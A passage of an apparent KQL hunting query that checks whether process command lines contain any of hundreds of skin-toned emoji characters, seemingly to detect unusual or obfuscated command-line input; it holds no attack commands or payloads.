ProcessCommandLine contains "🧝🏽‍♀️" or ProcessCommandLine contains "🧝🏽" or ProcessCommandLine contains "🧝🏽‍♂️" or ProcessCommandLine contains "🧛🏽‍♀️" or ProcessCommandLine contains "🧛🏽" or ProcessCommandLine 
contains "🧛🏽‍♂️" or ProcessCommandLine contains "🧜🏽‍♀️" or ProcessCommandLine contains "🧜🏽" or ProcessCommandLine contains "🧜🏽‍♂️" or ProcessCommandLine contains "🧚🏽‍♀️" or ProcessCommandLine contains "🧚🏽" or ProcessCommandLine contains "🧚🏽‍♂️" or ProcessCommandLine contains "👼🏽" or ProcessCommandLine contains "🤰🏽" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🤱🏽" or ProcessCommandLine contains "👩🏽‍🍼" or ProcessCommandLine contains "🧑🏽‍🍼" or ProcessCommandLine contains "👨🏽‍🍼" or ProcessCommandLine contains "🙇🏽‍♀️" or ProcessCommandLine contains "🙇🏽" or ProcessCommandLine contains "🙇🏽‍♂️" or ProcessCommandLine contains "💁🏽‍♀️" or ProcessCommandLine contains "💁🏽" or ProcessCommandLine contains "💁🏽‍♂️" or ProcessCommandLine contains "🙅🏽‍♀️" or ProcessCommandLine contains "🙅🏽" or ProcessCommandLine contains "🙅🏽‍♂️" or ProcessCommandLine contains "🙆🏽‍♀️" or ProcessCommandLine contains "🙆🏽" or ProcessCommandLine contains "🙆🏽‍♂️" or ProcessCommandLine contains "🙋🏽‍♀️" or ProcessCommandLine contains "🙋🏽" or ProcessCommandLine contains "🙋🏽‍♂️" or ProcessCommandLine contains "🧏🏽‍♀️" or ProcessCommandLine contains "🧏🏽" or ProcessCommandLine contains "🧏🏽‍♂️" or ProcessCommandLine contains "🤦🏽‍♀️" or ProcessCommandLine contains "🤦🏽" or ProcessCommandLine contains "🤦🏽‍♂️" or ProcessCommandLine contains "🤷🏽‍♀️" or ProcessCommandLine contains "🤷🏽" or ProcessCommandLine contains "🤷🏽‍♂️" or ProcessCommandLine contains "🙎🏽‍♀️" or ProcessCommandLine contains "🙎🏽" or ProcessCommandLine contains "🙎🏽‍♂️" or ProcessCommandLine contains "🙍🏽‍♀️" or ProcessCommandLine contains "🙍🏽" or ProcessCommandLine contains "🙍🏽‍♂️" or ProcessCommandLine contains "💇🏽‍♀️" or ProcessCommandLine contains "💇🏽" or ProcessCommandLine contains "💇🏽‍♂️" or ProcessCommandLine contains "💆🏽‍♀️" or ProcessCommandLine contains "💆🏽" or ProcessCommandLine contains "💆🏽‍♂️" or ProcessCommandLine contains "🧖🏽‍♀️" or ProcessCommandLine contains "🧖🏽" or 
ProcessCommandLine contains "🧖🏽‍♂️" or ProcessCommandLine contains "💃🏽" or ProcessCommandLine contains "🕺🏽" or ProcessCommandLine contains "🕴🏽" or ProcessCommandLine contains "👩🏽‍🦽" or ProcessCommandLine contains "🧑🏽‍🦽" or ProcessCommandLine contains "👨🏽‍🦽" or ProcessCommandLine contains "👩🏽‍🦼" or ProcessCommandLine contains "🧑🏽‍🦼" or ProcessCommandLine contains "👨🏽‍🦼" or ProcessCommandLine contains "🚶🏽‍♀️" or ProcessCommandLine contains "🚶🏽" or ProcessCommandLine contains "🚶🏽‍♂️" or ProcessCommandLine contains "👩🏽‍🦯" or ProcessCommandLine contains "🧑🏽‍🦯" or ProcessCommandLine contains "👨🏽‍🦯" or ProcessCommandLine contains "🧎🏽‍♀️" or ProcessCommandLine contains "🧎🏽" or ProcessCommandLine contains "🧎🏽‍♂️" or ProcessCommandLine contains "🏃🏽‍♀️" or ProcessCommandLine contains "🏃🏽" or ProcessCommandLine contains "🏃🏽‍♂️" or ProcessCommandLine contains "🧍🏽‍♀️" or ProcessCommandLine contains "🧍🏽" or ProcessCommandLine contains "🧍🏽‍♂️" or ProcessCommandLine contains "👭🏽" or ProcessCommandLine contains "🧑🏽‍🤝‍🧑🏽" or ProcessCommandLine contains "👬🏽" or ProcessCommandLine contains "👫🏽" or ProcessCommandLine contains "🧗🏽‍♀️" or ProcessCommandLine contains "🧗🏽" or ProcessCommandLine contains "🧗🏽‍♂️" or ProcessCommandLine contains "🏇🏽" or ProcessCommandLine contains "🏂🏽" or ProcessCommandLine contains "🏌🏽‍♀️" or ProcessCommandLine contains "🏌🏽" or ProcessCommandLine contains "🏌🏽‍♂️" or ProcessCommandLine contains "🏄🏽‍♀️" or ProcessCommandLine contains "🏄🏽" or ProcessCommandLine contains "🏄🏽‍♂️" or ProcessCommandLine contains "🚣🏽‍♀️" or ProcessCommandLine contains "🚣🏽" or ProcessCommandLine contains "🚣🏽‍♂️" or ProcessCommandLine contains "🏊🏽‍♀️" or ProcessCommandLine contains "🏊🏽" or ProcessCommandLine contains "🏊🏽‍♂️" or ProcessCommandLine contains "⛹🏽‍♀️" or ProcessCommandLine contains "⛹🏽" or ProcessCommandLine contains "⛹🏽‍♂️" or ProcessCommandLine contains "🏋🏽‍♀️" or ProcessCommandLine contains "🏋🏽" or ProcessCommandLine contains "🏋🏽‍♂️" or ProcessCommandLine contains "🚴🏽‍♀️" 
or ProcessCommandLine contains "🚴🏽" or ProcessCommandLine contains "🚴🏽‍♂️" or ProcessCommandLine contains "🚵🏽‍♀️" or ProcessCommandLine contains "🚵🏽" or ProcessCommandLine contains "🚵🏽‍♂️" or ProcessCommandLine contains "🤸🏽‍♀️" or ProcessCommandLine contains "🤸🏽" or ProcessCommandLine contains "🤸🏽‍♂️" or ProcessCommandLine contains "🤽🏽‍♀️" or ProcessCommandLine contains "🤽🏽" or ProcessCommandLine contains "🤽🏽‍♂️" or ProcessCommandLine contains "🤾🏽‍♀️" or ProcessCommandLine contains "🤾🏽" or ProcessCommandLine contains "🤾🏽‍♂️" or ProcessCommandLine contains "🤹🏽‍♀️" or ProcessCommandLine contains "🤹🏽" or ProcessCommandLine contains "🤹🏽‍♂️" or ProcessCommandLine contains "🧘🏽‍♀️" or ProcessCommandLine contains "🧘🏽" or ProcessCommandLine contains "🧘🏽‍♂️" or ProcessCommandLine contains "🛀🏽" or ProcessCommandLine contains "🛌🏽" or ProcessCommandLine contains "👋🏾" or ProcessCommandLine contains "🤚🏾" or ProcessCommandLine contains "🖐🏾" or ProcessCommandLine contains "✋🏾" or ProcessCommandLine contains "🖖🏾" or ProcessCommandLine contains "👌🏾" or ProcessCommandLine contains "🤌🏾" or ProcessCommandLine contains "🤏🏾" or ProcessCommandLine contains "✌🏾" or ProcessCommandLine contains "🤞🏾" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🤟🏾" or ProcessCommandLine contains "🤘🏾" or ProcessCommandLine contains "🤙🏾" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "👈🏾" or ProcessCommandLine contains "👉🏾" or ProcessCommandLine contains "👆🏾" or ProcessCommandLine contains "🖕🏾" or ProcessCommandLine contains "👇🏾" or ProcessCommandLine contains "☝🏾" or ProcessCommandLine contains "👍🏾" or ProcessCommandLine contains "👎🏾" or ProcessCommandLine contains "✊🏾" or ProcessCommandLine contains "👊🏾" or ProcessCommandLine contains "🤛🏾" or ProcessCommandLine contains "🤜🏾" or ProcessCommandLine contains "👏🏾" or 
ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🙌🏾" or ProcessCommandLine contains "👐🏾" or ProcessCommandLine contains "🤲🏾" or ProcessCommandLine contains "🙏🏾" or ProcessCommandLine contains "✍🏾" or ProcessCommandLine contains "💪🏾" or ProcessCommandLine contains "🦵🏾" or ProcessCommandLine contains "🦶🏾" or ProcessCommandLine contains "👂🏾" or ProcessCommandLine contains "🦻🏾" or ProcessCommandLine contains "👃🏾" or ProcessCommandLine contains "👶🏾" or ProcessCommandLine contains "👧🏾" or ProcessCommandLine contains "🧒🏾" or ProcessCommandLine contains "👦🏾" or ProcessCommandLine contains "👩🏾" or ProcessCommandLine contains "🧑🏾" or ProcessCommandLine contains "👨🏾" or ProcessCommandLine contains "👩🏾‍🦱" or ProcessCommandLine contains "🧑🏾‍🦱" or ProcessCommandLine contains "👨🏾‍🦱" or ProcessCommandLine contains "👩🏾‍🦰" or ProcessCommandLine contains "🧑🏾‍🦰" or ProcessCommandLine contains "👨🏾‍🦰" or ProcessCommandLine contains "👱🏾‍♀️" or ProcessCommandLine contains "👱🏾" or ProcessCommandLine contains "👱🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦳" or ProcessCommandLine contains "🧑🏾‍🦳" or ProcessCommandLine contains "👨🏾‍🦳" or ProcessCommandLine contains "👩🏾‍🦲" or ProcessCommandLine contains "🧑🏾‍🦲" or ProcessCommandLine contains "👨🏾‍🦲" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏾" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "👵🏾" or ProcessCommandLine contains "🧓🏾" or ProcessCommandLine contains "👴🏾" or ProcessCommandLine contains "👲🏾" or ProcessCommandLine contains "👳🏾‍♀️" or ProcessCommandLine contains "👳🏾" or ProcessCommandLine contains "👳🏾‍♂️" or ProcessCommandLine contains "🧕🏾" or ProcessCommandLine contains "👮🏾‍♀️" or ProcessCommandLine contains "👮🏾" or ProcessCommandLine contains "👮🏾‍♂️" or ProcessCommandLine contains "👷🏾‍♀️" or ProcessCommandLine contains "👷🏾" or ProcessCommandLine contains "👷🏾‍♂️" or ProcessCommandLine contains "💂🏾‍♀️" or ProcessCommandLine contains "💂🏾" or ProcessCommandLine contains 
"💂🏾‍♂️" or ProcessCommandLine contains "🕵🏾‍♀️" or ProcessCommandLine contains "🕵🏾" or ProcessCommandLine contains "🕵🏾‍♂️" or ProcessCommandLine contains "👩🏾‍⚕️" or ProcessCommandLine contains "🧑🏾‍⚕️" or ProcessCommandLine contains "👨🏾‍⚕️" or ProcessCommandLine contains "👩🏾‍🌾" or ProcessCommandLine contains "🧑🏾‍🌾" or ProcessCommandLine contains "👨🏾‍🌾" or ProcessCommandLine contains "👩🏾‍🍳" or ProcessCommandLine contains "🧑🏾‍🍳" or ProcessCommandLine contains "👨🏾‍🍳" or ProcessCommandLine contains "👩🏾‍🎓" or ProcessCommandLine contains "🧑🏾‍🎓" or ProcessCommandLine contains "👨🏾‍🎓" or ProcessCommandLine contains "👩🏾‍🎤" or ProcessCommandLine contains "🧑🏾‍🎤" or ProcessCommandLine contains "👨🏾‍🎤" or ProcessCommandLine contains "👩🏾‍🏫" or ProcessCommandLine contains "🧑🏾‍🏫" or ProcessCommandLine contains "👨🏾‍🏫" or ProcessCommandLine contains "👩🏾‍🏭" or ProcessCommandLine contains "🧑🏾‍🏭" or ProcessCommandLine contains "👨🏾‍🏭" or ProcessCommandLine contains "👩🏾‍💻" or ProcessCommandLine contains "🧑🏾‍💻" or ProcessCommandLine contains "👨🏾‍💻" or ProcessCommandLine contains "👩🏾‍💼" or ProcessCommandLine contains "🧑🏾‍💼" or ProcessCommandLine contains "👨🏾‍💼" or ProcessCommandLine contains "👩🏾‍🔧" or ProcessCommandLine contains "🧑🏾‍🔧" or ProcessCommandLine contains "👨🏾‍🔧" or ProcessCommandLine contains "👩🏾‍🔬" or ProcessCommandLine contains "🧑🏾‍🔬" or ProcessCommandLine contains "👨🏾‍🔬" or ProcessCommandLine contains "👩🏾‍🎨" or ProcessCommandLine contains "🧑🏾‍🎨" or ProcessCommandLine contains "👨🏾‍🎨" or ProcessCommandLine contains "👩🏾‍🚒" or ProcessCommandLine contains "🧑🏾‍🚒" or ProcessCommandLine contains "👨🏾‍🚒" or ProcessCommandLine contains "👩🏾‍✈️" or ProcessCommandLine contains "🧑🏾‍✈️" or ProcessCommandLine contains "👨🏾‍✈️" or ProcessCommandLine contains "👩🏾‍🚀" or ProcessCommandLine contains "🧑🏾‍🚀" or ProcessCommandLine contains "👨🏾‍🚀" or ProcessCommandLine contains "👩🏾‍⚖️" or ProcessCommandLine contains "🧑🏾‍⚖️" or ProcessCommandLine contains "👨🏾‍⚖️" or ProcessCommandLine contains "👰🏾‍♀️" or 
ProcessCommandLine contains "👰🏾" or ProcessCommandLine contains "👰🏾‍♂️" or ProcessCommandLine contains "🤵🏾‍♀️" or ProcessCommandLine contains "🤵🏾" or ProcessCommandLine contains "🤵🏾‍♂️" or ProcessCommandLine contains "👸🏾" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🤴🏾" or ProcessCommandLine contains "🥷🏾" or ProcessCommandLine contains "🦸🏾‍♀️" or ProcessCommandLine contains "🦸🏾" or ProcessCommandLine contains "🦸🏾‍♂️" or ProcessCommandLine contains "🦹🏾‍♀️" or ProcessCommandLine contains "🦹🏾" or ProcessCommandLine contains "🦹🏾‍♂️" or ProcessCommandLine contains "🤶🏾" or ProcessCommandLine contains "🧑🏾‍🎄" or ProcessCommandLine contains "🎅🏾" or ProcessCommandLine contains "🧙🏾‍♀️" or ProcessCommandLine contains "🧙🏾" or ProcessCommandLine contains "🧙🏾‍♂️" or ProcessCommandLine contains "🧝🏾‍♀️" or ProcessCommandLine contains "🧝🏾" or ProcessCommandLine contains "🧝🏾‍♂️" or ProcessCommandLine contains "🧛🏾‍♀️" or ProcessCommandLine contains "🧛🏾" or ProcessCommandLine contains "🧛🏾‍♂️" or ProcessCommandLine contains "🧜🏾‍♀️" or ProcessCommandLine contains "🧜🏾" or ProcessCommandLine contains "🧜🏾‍♂️" or ProcessCommandLine contains "🧚🏾‍♀️" or ProcessCommandLine contains "🧚🏾" or ProcessCommandLine contains "🧚🏾‍♂️" or ProcessCommandLine contains "👼🏾" or ProcessCommandLine contains "🤰🏾" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🤱🏾" or ProcessCommandLine contains "👩🏾‍🍼" or ProcessCommandLine contains "🧑🏾‍🍼" or ProcessCommandLine contains "👨🏾‍🍼" or ProcessCommandLine contains "🙇🏾‍♀️" or ProcessCommandLine contains "🙇🏾" or ProcessCommandLine contains "🙇🏾‍♂️" or ProcessCommandLine contains "💁🏾‍♀️" or ProcessCommandLine contains "💁🏾" or ProcessCommandLine contains "💁🏾‍♂️" or ProcessCommandLine contains "🙅🏾‍♀️" or ProcessCommandLine contains "🙅🏾" or ProcessCommandLine contains "🙅🏾‍♂️" or ProcessCommandLine contains "🙆🏾‍♀️" or ProcessCommandLine contains "🙆🏾" or ProcessCommandLine contains "🙆🏾‍♂️" or 
ProcessCommandLine contains "🙋🏾‍♀️" or ProcessCommandLine contains "🙋🏾" or ProcessCommandLine contains "🙋🏾‍♂️" or ProcessCommandLine contains "🧏🏾‍♀️" or ProcessCommandLine contains "🧏🏾" or ProcessCommandLine contains "🧏🏾‍♂️" or ProcessCommandLine contains "🤦🏾‍♀️" or ProcessCommandLine contains "🤦🏾" or ProcessCommandLine contains "🤦🏾‍♂️" or ProcessCommandLine contains "🤷🏾‍♀️" or ProcessCommandLine contains "🤷🏾" or ProcessCommandLine contains "🤷🏾‍♂️" or ProcessCommandLine contains "🙎🏾‍♀️" or ProcessCommandLine contains "🙎🏾" or ProcessCommandLine contains "🙎🏾‍♂️" or ProcessCommandLine contains "🙍🏾‍♀️" or ProcessCommandLine contains "🙍🏾" or ProcessCommandLine contains "🙍🏾‍♂️" or ProcessCommandLine contains "💇🏾‍♀️" or ProcessCommandLine contains "💇🏾" or ProcessCommandLine contains "💇🏾‍♂️" or ProcessCommandLine contains "💆🏾‍♀️" or ProcessCommandLine contains "💆🏾" or ProcessCommandLine contains "💆🏾‍♂️" or ProcessCommandLine contains "🧖🏾‍♀️" or ProcessCommandLine contains "🧖🏾" or ProcessCommandLine contains "🧖🏾‍♂️" or ProcessCommandLine contains "💃🏾" or ProcessCommandLine contains "🕺🏾" or ProcessCommandLine contains "👩🏾‍🦽" or ProcessCommandLine contains "🧑🏾‍🦽" or ProcessCommandLine contains "👨🏾‍🦽" or ProcessCommandLine contains "👩🏾‍🦼" or ProcessCommandLine contains "🧑🏾‍🦼" or ProcessCommandLine contains "👨🏾‍🦼" or ProcessCommandLine contains "🚶🏾‍♀️" or ProcessCommandLine contains "🚶🏾" or ProcessCommandLine contains "🚶🏾‍♂️" or ProcessCommandLine contains "👩🏾‍🦯" or ProcessCommandLine contains "🧑🏾‍🦯" or ProcessCommandLine contains "👨🏾‍🦯" or ProcessCommandLine contains "🧎🏾‍♀️" or ProcessCommandLine contains "🧎🏾" or ProcessCommandLine contains "🧎🏾‍♂️" or ProcessCommandLine contains "🏃🏾‍♀️" or ProcessCommandLine contains "🏃🏾" or ProcessCommandLine contains "🏃🏾‍♂️" or ProcessCommandLine contains "🧍🏾‍♀️" or ProcessCommandLine contains "🧍🏾" or ProcessCommandLine contains "🧍🏾‍♂️" or ProcessCommandLine contains "👭🏾" or ProcessCommandLine contains "🧑🏾‍🤝‍🧑🏾" or ProcessCommandLine 
contains "👬🏾" or ProcessCommandLine contains "👫🏾" or ProcessCommandLine contains "🧗🏾‍♀️" or ProcessCommandLine contains "🧗🏾" or ProcessCommandLine contains "🧗🏾‍♂️" or ProcessCommandLine contains "🏇🏾" or ProcessCommandLine contains "🏂🏾" or ProcessCommandLine contains "🏌🏾‍♀️" or ProcessCommandLine contains "🏌🏾" or ProcessCommandLine contains "🏌🏾‍♂️" or ProcessCommandLine contains "🏄🏾‍♀️" or ProcessCommandLine contains "🏄🏾" or ProcessCommandLine contains "🏄🏾‍♂️" or ProcessCommandLine contains "🚣🏾‍♀️" or ProcessCommandLine contains "🚣🏾" or ProcessCommandLine contains "🚣🏾‍♂️" or ProcessCommandLine contains "🏊🏾‍♀️" or ProcessCommandLine contains "🏊🏾" or ProcessCommandLine contains "🏊🏾‍♂️" or ProcessCommandLine contains "⛹🏾‍♀️" or ProcessCommandLine contains "⛹🏾" or ProcessCommandLine contains "⛹🏾‍♂️" or ProcessCommandLine contains "🏋🏾‍♀️" or ProcessCommandLine contains "🏋🏾" or ProcessCommandLine contains "🏋🏾‍♂️" or ProcessCommandLine contains "🚴🏾‍♀️" or ProcessCommandLine contains "🚴🏾" or ProcessCommandLine contains "🚴🏾‍♂️" or ProcessCommandLine contains "🚵🏾‍♀️" or ProcessCommandLine contains "🚵🏾" or ProcessCommandLine contains "🚵🏾‍♂️" or ProcessCommandLine contains "🤸🏾‍♀️" or ProcessCommandLine contains "🤸🏾" or ProcessCommandLine contains "🤸🏾‍♂️" or ProcessCommandLine contains "🤽🏾‍♀️" or ProcessCommandLine contains "🤽🏾" or ProcessCommandLine contains "🤽🏾‍♂️" or ProcessCommandLine contains "🤾🏾‍♀️" or ProcessCommandLine contains "🤾🏾" or ProcessCommandLine contains "🤾🏾‍♂️" or ProcessCommandLine contains "🤹🏾‍♀️" or ProcessCommandLine contains "🤹🏾" or ProcessCommandLine contains "🤹🏾‍♂️" or ProcessCommandLine contains "🧘🏾‍♀️" or ProcessCommandLine contains "🧘🏾" or ProcessCommandLine contains "🧘🏾‍♂️" or ProcessCommandLine contains "🛀🏾" or ProcessCommandLine contains "🛌🏾" or ProcessCommandLine contains "👋🏿" or ProcessCommandLine contains "🤚🏿" or ProcessCommandLine contains "🖐🏿" or ProcessCommandLine contains "✋🏿" or ProcessCommandLine contains "🖖🏿" or ProcessCommandLine 
contains "👌🏿" or ProcessCommandLine contains "🤌🏿" or ProcessCommandLine contains "🤏🏿" or ProcessCommandLine contains "✌🏿" or ProcessCommandLine contains "🤞🏿" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🤟🏿" or ProcessCommandLine contains "🤘🏿" or ProcessCommandLine contains "🤙🏿" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "👈🏿" or ProcessCommandLine contains "👉🏿" or ProcessCommandLine contains "👆🏿" or ProcessCommandLine contains "🖕🏿" or ProcessCommandLine contains "👇🏿" or ProcessCommandLine contains "☝🏿" or ProcessCommandLine contains "👍🏿" or ProcessCommandLine contains "👎🏿" or ProcessCommandLine contains "✊🏿" or ProcessCommandLine contains "👊🏿" or ProcessCommandLine contains "🤛🏿" or ProcessCommandLine contains "🤜🏿" or ProcessCommandLine contains "👏🏿" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🙌🏿" or ProcessCommandLine contains "👐🏿" or ProcessCommandLine contains "🤲🏿" or ProcessCommandLine contains "🙏🏿" or ProcessCommandLine contains "✍🏿" or ProcessCommandLine contains "🤳🏿" or ProcessCommandLine contains "💪🏿" or ProcessCommandLine contains "🦵🏿" or ProcessCommandLine contains "🦶🏿" or ProcessCommandLine contains "👂🏿" or ProcessCommandLine contains "🦻🏿" or ProcessCommandLine contains "👃🏿" or ProcessCommandLine contains "👶🏿" or ProcessCommandLine contains "👧🏿" or ProcessCommandLine contains "🧒🏿" or ProcessCommandLine contains "👦🏿" or ProcessCommandLine contains "👩🏿" or ProcessCommandLine contains "🧑🏿" or ProcessCommandLine contains "👨🏿" or ProcessCommandLine contains "👩🏿‍🦱" or ProcessCommandLine contains "🧑🏿‍🦱" or ProcessCommandLine contains "👨🏿‍🦱" or ProcessCommandLine contains "👩🏿‍🦰" or ProcessCommandLine contains "🧑🏿‍🦰" or ProcessCommandLine contains "👨🏿‍🦰" or ProcessCommandLine contains "👱🏿‍♀️" or ProcessCommandLine contains "👱🏿" or ProcessCommandLine 
contains "👱🏿‍♂️" or ProcessCommandLine contains "👩🏿‍🦳" or ProcessCommandLine contains "🧑🏿‍🦳" or ProcessCommandLine contains "👨🏿‍🦳" or ProcessCommandLine contains "👩🏿‍🦲" or ProcessCommandLine contains "🧑🏿‍🦲" or ProcessCommandLine contains "👨🏿‍🦲" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔🏿" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "👵🏿" or ProcessCommandLine contains "🧓🏿" or ProcessCommandLine contains "👴🏿" or ProcessCommandLine contains "👲🏿" or ProcessCommandLine contains "👳🏿‍♀️" or ProcessCommandLine contains "👳🏿" or ProcessCommandLine contains "👳🏿‍♂️" or ProcessCommandLine contains "🧕🏿" or ProcessCommandLine contains "👮🏿‍♀️" or ProcessCommandLine contains "👮🏿" or ProcessCommandLine contains "👮🏿‍♂️" or ProcessCommandLine contains "👷🏿‍♀️" or ProcessCommandLine contains "👷🏿" or ProcessCommandLine contains "👷🏿‍♂️" or ProcessCommandLine contains "💂🏿‍♀️" or ProcessCommandLine contains "💂🏿" or ProcessCommandLine contains "💂🏿‍♂️" or ProcessCommandLine contains "🕵🏿‍♀️" or ProcessCommandLine contains "🕵🏿" or ProcessCommandLine contains "🕵🏿‍♂️" or ProcessCommandLine contains "👩🏿‍⚕️" or ProcessCommandLine contains "🧑🏿‍⚕️" or ProcessCommandLine contains "👨🏿‍⚕️" or ProcessCommandLine contains "👩🏿‍🌾" or ProcessCommandLine contains "🧑🏿‍🌾" or ProcessCommandLine contains "👨🏿‍🌾" or ProcessCommandLine contains "👩🏿‍🍳" or ProcessCommandLine contains "🧑🏿‍🍳" or ProcessCommandLine contains "👨🏿‍🍳" or ProcessCommandLine contains "👩🏿‍🎓" or ProcessCommandLine contains "🧑🏿‍🎓" or ProcessCommandLine contains "👨🏿‍🎓" or ProcessCommandLine contains "👩🏿‍🎤" or ProcessCommandLine contains "🧑🏿‍🎤" or ProcessCommandLine contains "👨🏿‍🎤" or ProcessCommandLine contains "👩🏿‍🏫" or ProcessCommandLine contains "🧑🏿‍🏫" or ProcessCommandLine contains "👨🏿‍🏫" or ProcessCommandLine contains "👩🏿‍🏭" or ProcessCommandLine contains "🧑🏿‍🏭" or ProcessCommandLine contains "👨🏿‍🏭" or ProcessCommandLine contains "👩🏿‍💻" or ProcessCommandLine contains "🧑🏿‍💻" or 
ProcessCommandLine contains "👨🏿‍💻" or ProcessCommandLine contains "👩🏿‍💼" or ProcessCommandLine contains "🧑🏿‍💼" or ProcessCommandLine contains "👨🏿‍💼" or ProcessCommandLine contains "👩🏿‍🔧" or ProcessCommandLine contains "🧑🏿‍🔧" or ProcessCommandLine contains "👨🏿‍🔧" or ProcessCommandLine contains "👩🏿‍🔬" or ProcessCommandLine contains "🧑🏿‍🔬" or ProcessCommandLine contains "👨🏿‍🔬" or ProcessCommandLine contains "👩🏿‍🎨" or ProcessCommandLine contains "🧑🏿‍🎨" or ProcessCommandLine contains "👨🏿‍🎨" or ProcessCommandLine contains "👩🏿‍🚒" or ProcessCommandLine contains "🧑🏿‍🚒" or ProcessCommandLine contains "👨🏿‍🚒" or ProcessCommandLine contains "👩🏿‍✈️" or ProcessCommandLine contains "🧑🏿‍✈️" or ProcessCommandLine contains "👨🏿‍✈️" or ProcessCommandLine contains "👩🏿‍🚀" or ProcessCommandLine contains "🧑🏿‍🚀" or ProcessCommandLine contains "👨🏿‍🚀" or ProcessCommandLine contains "👩🏿‍⚖️" or ProcessCommandLine contains "🧑🏿‍⚖️" or ProcessCommandLine contains "👨🏿‍⚖️" or ProcessCommandLine contains "👰🏿‍♀️" or ProcessCommandLine contains "👰🏿" or ProcessCommandLine contains "👰🏿‍♂️" or ProcessCommandLine contains "🤵🏿‍♀️" or ProcessCommandLine contains "🤵🏿" or ProcessCommandLine contains "🤵🏿‍♂️" or ProcessCommandLine contains "👸🏿" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🤴🏿" or ProcessCommandLine contains "🥷🏿" or ProcessCommandLine contains "🦸🏿‍♀️" or ProcessCommandLine contains "🦸🏿" or ProcessCommandLine contains "🦸🏿‍♂️" or ProcessCommandLine contains "🦹🏿‍♀️" or ProcessCommandLine contains "🦹🏿" or ProcessCommandLine contains "🦹🏿‍♂️" or ProcessCommandLine contains "🤶🏿" or ProcessCommandLine contains "🧑🏿‍🎄" or ProcessCommandLine contains "🎅🏿" or ProcessCommandLine contains "🧙🏿‍♀️" or ProcessCommandLine contains "🧙🏿" or ProcessCommandLine contains "🧙🏿‍♂️" or ProcessCommandLine contains "🧝🏿‍♀️" or ProcessCommandLine contains "🧝🏿" or ProcessCommandLine contains "🧝🏿‍♂️" or ProcessCommandLine contains "🧛🏿‍♀️" or ProcessCommandLine contains "🧛🏿" or ProcessCommandLine contains 
"🧛🏿‍♂️" or ProcessCommandLine contains "🧜🏿‍♀️" or ProcessCommandLine contains "🧜🏿" or ProcessCommandLine contains "🧜🏿‍♂️" or ProcessCommandLine contains "🧚🏿‍♀️" or ProcessCommandLine contains "🧚🏿" or ProcessCommandLine contains "🧚🏿‍♂️" or ProcessCommandLine contains "👼🏿" or ProcessCommandLine contains "🤰🏿" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🤱🏿" or ProcessCommandLine contains "👩🏿‍🍼" or ProcessCommandLine contains "🧑🏿‍🍼" or ProcessCommandLine contains "👨🏿‍🍼" or ProcessCommandLine contains "🙇🏿‍♀️" or ProcessCommandLine contains "🙇🏿" or ProcessCommandLine contains "🙇🏿‍♂️" or ProcessCommandLine contains "💁🏿‍♀️" or ProcessCommandLine contains "💁🏿" or ProcessCommandLine contains "💁🏿‍♂️" or ProcessCommandLine contains "🙅🏿‍♀️" or ProcessCommandLine contains "🙅🏿" or ProcessCommandLine contains "🙅🏿‍♂️" or ProcessCommandLine contains "🙆🏿‍♀️" or ProcessCommandLine contains "🙆🏿" or ProcessCommandLine contains "🙆🏿‍♂️" or ProcessCommandLine contains "🙋🏿‍♀️" or ProcessCommandLine contains "🙋🏿" or ProcessCommandLine contains "🙋🏿‍♂️" or ProcessCommandLine contains "🧏🏿‍♀️" or ProcessCommandLine contains "🧏🏿" or ProcessCommandLine contains "🧏🏿‍♂️" or ProcessCommandLine contains "🤦🏿‍♀️" or ProcessCommandLine contains "🤦🏿" or ProcessCommandLine contains "🤦🏿‍♂️" or ProcessCommandLine contains "🤷🏿‍♀️" or ProcessCommandLine contains "🤷🏿" or ProcessCommandLine contains "🤷🏿‍♂️" or ProcessCommandLine contains "🙎🏿‍♀️" or ProcessCommandLine contains "🙎🏿" or ProcessCommandLine contains "🙎🏿‍♂️" or ProcessCommandLine contains "🙍🏿‍♀️" or ProcessCommandLine contains "🙍🏿" or ProcessCommandLine contains "🙍🏿‍♂️" or ProcessCommandLine contains "💇🏿‍♀️" or ProcessCommandLine contains "💇🏿" or ProcessCommandLine contains "💇🏿‍♂️" or ProcessCommandLine contains "💆🏿‍♀️" or ProcessCommandLine contains "💆🏿" or ProcessCommandLine contains "💆🏿‍♂️" or ProcessCommandLine contains "🧖🏿‍♀️" or ProcessCommandLine contains "🧖🏿" or ProcessCommandLine 
